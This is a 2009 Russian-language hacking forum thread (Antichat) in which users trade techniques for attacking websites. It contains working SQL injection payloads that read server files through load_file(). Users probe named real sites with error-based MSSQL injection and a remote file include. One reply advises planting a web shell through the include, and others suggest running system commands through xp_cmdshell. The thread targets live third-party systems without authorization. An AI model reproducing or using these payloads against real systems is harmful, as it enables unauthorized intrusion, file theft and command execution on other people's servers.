21.11.2009, 20:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
2 InFlame
чтение файлов возможно, используй load_file(). Естественно для успешного чтения юзер под которым работает бд должен иметь file_priv = Y
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(load_file('C:/boot.ini'),1)d) as t JOIN (SELECT NAME_CONST(load_file('C:/boot.ini'),1)e)b)a
вывод режется до 64 символов
остальные символы читаем с помощью функции substr()
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)d) as t JOIN (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)e)b)a
|
|
|
22.11.2009, 06:31
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
на
http://investorshub.advfn.com/boards/boards_moderated.asp?user='
Microsoft SQL Native Client error '80040e14'
Unclosed quotation mark after the character string ''.
/boards/boards_moderated.asp, line 19
а на
http://investorshub.advfn.com/boards/boards_moderated.asp?user='+and+1=convert(int,@@ve rsion)--
идеть редирект на главную страницу. Как поступит в данном случае или просто забыть про ресурс? |
|
|
|
22.11.2009, 10:43
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680
Репутация:
2
|
|
Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить?
Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru
|
|
|
|
22.11.2009, 13:35
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
есть ли возможность брутить сами имена таблицы посимвольно на 4 вертке MySQL? А то тока на 5 версии есть такое возможность
|
|
|
|
22.11.2009, 16:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Pashkela
Тьфу, не так понял, зачем брутить посимвольно, если можно целиком  Есс-но посимвольно не получиться, там же нет information_schema, чо за вопросы вообще, аж в ступор вводят Хех Pashkela я знаю что там нету inf_sch, вед если не знаеш префикс таблицы, то бесполезно твои гадания нас чет префиксов. Если бы было возможность брутить хотябы таблицы(не колонки) посимвольно тогда было бы супер.
ЗЫ. В ступорь не вводись ты еще нужень для поддержки мега тулзы
|
|
|
|
22.11.2009, 14:16
|
|
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497
Репутация:
10
|
|
Сообщение от Nosfer
Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить?
Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru
можно
залей на какой нить свой сайт шелл и подаставь его
типо http://www.pngbd.com/business/?page=http://site/shell.txt
YuNi|[c
по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц 
Последний раз редактировалось BlackPanther; 22.11.2009 в 14:19..
|
|
|
|
22.11.2009, 14:22
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от BlackPanther
можно
залей на какой нить свой сайт шелл и подаставь его
типо http://www.pngbd.com/business/?page=http://site/shell.txt
YuNi|[c
по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц Это фрейм =\
|
|
|
|
22.11.2009, 16:00
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
пробуем зайти на сайт (точнее на админку) - показывает пустую страницу (и исходный код тоже пуст). Что это за фигня? Можно как нибудь обойти?
|
|
|
|
22.11.2009, 22:54
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
Имею код вида
Код:
<?php
...
$some = $_POST[some];
$s = mssql_query($some);
и тут уже вывод того, что получилось.
?>
Дело в том, что кавычки экранируются. Как использовать тогда
exec master..xp_cmdshell ??? |
|
|
|
22.11.2009, 22:59
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
часто работает exec master..xp_cmdshell [cmd]
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1708473){kind=avatar}
Похожие темы
Комбинированный вид
